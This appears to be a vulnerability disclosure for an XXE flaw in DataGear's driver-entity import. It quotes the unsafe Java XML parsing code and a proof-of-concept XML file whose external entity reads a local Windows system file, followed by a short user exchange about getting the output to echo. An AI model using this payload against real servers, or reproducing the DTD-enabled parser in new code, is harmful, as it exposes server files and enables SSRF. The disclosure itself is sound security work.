datageartech
XML External Entity (XXE) Vulnerability in /driverEntity/uploadImportFile
Description
DataGear is an open-source and free data visualization analysis platform that allows you to freely create any kind of data dashboard you want, supporting access to multiple data sources such as SQL, CSV, Excel, HTTP interface, JSON, etc.
DataGear 5.1.0 and below has a XXE vulnerability, which can exploit this vulnerability disclosing local files in the file system or perform a Server-Side Request Forgery (SSRF).
Unsafe Code
The org/datagear/connection/XmlDriverEntityManager.java#readDriverEntities function parses xml directly without disable DTD (Document Type Definition), and the xml is controllable, leading to XML External Entity.
@Override
protected List<DriverEntity> readDriverEntities(Reader in) throws DriverEntityManagerException
{
List<DriverEntity> driverEntities = new ArrayList<DriverEntity>();
DocumentBuilderFactory documentBuilderFactory;
DocumentBuilder documentBuilder;
Document document;
try
{
documentBuilderFactory = DocumentBuilderFactory.newInstance();
documentBuilder = documentBuilderFactory.newDocumentBuilder();
document = documentBuilder.parse(new InputSource(in));
Steps to Reproduce
Upload a zip file containing the driverEntityInfo.xml file, with the content of driverEntityInfo.xml as follows:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE driver-entities [
<!ENTITY edward SYSTEM "file:///C:/windows/win.ini">
]>
<driver-entities>
<driver-entity>
<id>&edward;</id>
<driver-class-name>com.mysql.jdbc.Driver</driver-class-name>
</driver-entity>
<driver-entity>
<id>mysql-jre8</id>
<driver-class-name>com.mysql.cj.jdbc.Driver</driver-class-name>
</driver-entity>
<driver-entity>
<id>oracle</id>
<driver-class-name>oracle.jdbc.OracleDriver</driver-class-name>
</driver-entity>
</driver-entities>
After sending the request, you can see the returned value after XML parsing
我改的url请求怎么没有回显啊
To upload a zip file containing a driverEntityInfo.xml. If the format is incorrect, it will not be parsed.
